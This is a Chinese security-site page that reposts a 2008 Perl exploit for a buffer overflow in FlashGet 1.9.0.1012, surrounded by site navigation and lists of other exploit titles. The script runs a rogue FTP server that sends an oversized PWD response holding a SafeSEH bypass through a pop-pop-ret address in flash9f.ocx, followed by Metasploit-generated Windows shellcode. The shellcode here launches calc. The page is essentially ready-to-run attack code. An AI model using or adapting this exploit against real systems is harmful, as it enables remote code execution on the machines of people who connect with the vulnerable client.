首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
来源:www.vfcocus.net 作者:k`sOSe 发布时间:2008-08-18  
#!/usr/bin/perl
# k`sOSe 08/17/2008
# bypass safeseh using flash9f.ocx.

use warnings;
use strict;
use IO::Socket;

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x08\xa3\x03\x10";


my $sock = IO::Socket::INET->new( LocalAddr => '0.0.0.0', LocalPort => '21', Listen => 1, Reuse => 1);

while(my $csock = $sock->accept())
{

print $csock "220 Hello ;)\r\n";
read_sock($csock);

print $csock "331 pwd please\r\n";
read_sock($csock);

print $csock "230 OK\r\n";
read_sock($csock);

print $csock "250 CWD command successful.\r\n";
read_sock($csock);

print $csock "257 " . "\x22" .
"\x41" x 324 .

"\xEB\x06\x90\x90" . # jump ahead
"\x82\x01\x02\x30" . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH   ;)

$shellcode .

"\x90" x 840 .
"\x22" .
" is current directory.\r\n";

close($csock);
exit;
}



sub read_sock
{
my ($sock) = @_;

my $buf = <$sock>;

print "[client] -> $buf";

}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EO Video 1.36 Local Heap Overf
·WS_FTP Home/Professional FTP C
·ESET Smart Security 3.0.667.0
·VMware Workstation (hcmon.sys
·Microsoft Visual Studio (Msmas
·Anzio Web Print Object <= 3.2.
·>FlashGet 1.9 (FTP PWD Respons
·Pars4U Videosharing V1 XSS / R
·IntelliTamper 2.07/2.08 Beta 4
·webEdition CMS (we_objectID) B
·NoName Script <= 1.1 Multiple
·Dana IRC 1.4a Remote Buffer Ov
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved